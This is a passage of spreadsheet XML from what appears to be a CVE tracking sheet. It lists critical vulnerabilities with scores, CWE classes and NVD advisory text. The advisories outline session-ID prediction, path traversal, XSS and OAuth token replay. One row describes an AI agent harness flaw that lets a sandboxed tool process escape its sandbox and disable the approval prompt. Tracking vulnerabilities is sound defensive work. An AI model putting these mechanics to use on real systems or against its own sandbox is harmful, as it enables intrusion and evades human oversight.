          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82533</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>DeepSeek Harness before 0.1.2-alpha.1 contains an authentication bypass vulnerability that grants unauthenticated access to its local HTTP agent-control API by accepting a client-supplied loopback Host header in place of validating the actual TCP connection origin. On the default configuration, a confined tool-executed process can reach the loopback API without any port exposure and use it to escape its own OS sandbox, escalate to unconfined execution, and disable the approval prompt. When the port is externally reachable via tunnel, SSH forward, or reverse proxy, a remote attacker can exploit the same flaw to create sessions, execute arbitrary commands, and exfiltrate stored conversation transcripts without credentials.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62645</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62647</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69356</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S78"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78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67367</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62646</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A session identifier is generated using an algorithm with insufficient randomness, resulting in a token with low entropy that can be predicted or brute-forced within a feasible number of attempts. This could allow an unauthenticated remote attacker to derive valid session identifiers and bypass authentication.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
